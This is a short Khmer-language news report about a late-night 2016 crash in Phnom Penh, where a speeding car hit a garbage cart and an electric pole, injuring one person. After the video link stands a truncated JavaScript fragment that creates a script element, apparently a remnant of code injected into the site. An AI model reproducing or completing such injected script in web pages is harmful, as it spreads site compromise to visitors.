(Video) ទំនងស្រវឹង បើកលឿនដូចហោះ បុករទេះដឹកសំរាម រួចទៅបុកបង្គោលភ្លើង របួសម្នាក់

ភ្នំពេញ៖នៅម៉ោង០១ និង ៣០ នាទីយប់ឈានចូលថ្ងៃទី ១៧ សីហា ឆ្នំា ២០១៦ មុខសាលា ជា សុីម សាមគ្គី ផ្លូវ271 សង្កាត់បឹងសាឡាង ខណ្ឌទួលគោក

មានករណីគ្រោះថ្នាក់បង្កឡើងដោយតៃកុងរថយន្តបើកលឿនដូចហោះ បុករទេះដឹកសំរាម រួចទៅបុកបង្គោលភ្លើង របួស01នាក់។

តាមប្រភពអ្នកឃើញ ហេតុការណ៍ នៅកន្លែងកើតហេតុ បានប្រាប់ អោយដឹងថាគាត់បានឃើញ រថយន្តបង្កហេតុ បើកមកពីទិសខាងជើង ទៅទិសខាងត្បូង ក្នុងល្បឿនលឿន ដូចរថយន្តប្រណាំង លុះមកដល់ផ្លូវកោង មុខសាលាជាសុីមសាមគ្គី ដោយសាររថយន្តលឿនពេក ក៍ជ្រុល ទៅឡើងចិញ្ចើមថ្នល់ សំដៅផ្ទះប្រជាពលរដ្ឋ ទើបអ្នកបើកបរ បានទាញចង្កូតមកវិញ ក៍បុកជាមួយ រទេះដឹកសំរាម រួចហួសទៅបុក បង្គោលភ្លើង បាក់អស់មួយដើម ទើបទៅមុខលែងរួច។
ក្រោយពេលកើតហេតុ សមត្ថកិច្ចបានស្ទូចរថយន្តបង្ករ យកទៅកាន់ ការិយាល័យ នគរបាលចរាចរណ៍ ក្រុងភ្នំពេញ ដើម្បីដោះស្រាយតាមច្បាប់៕

https://youtu.be/7CfXhxSFmtUvar d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More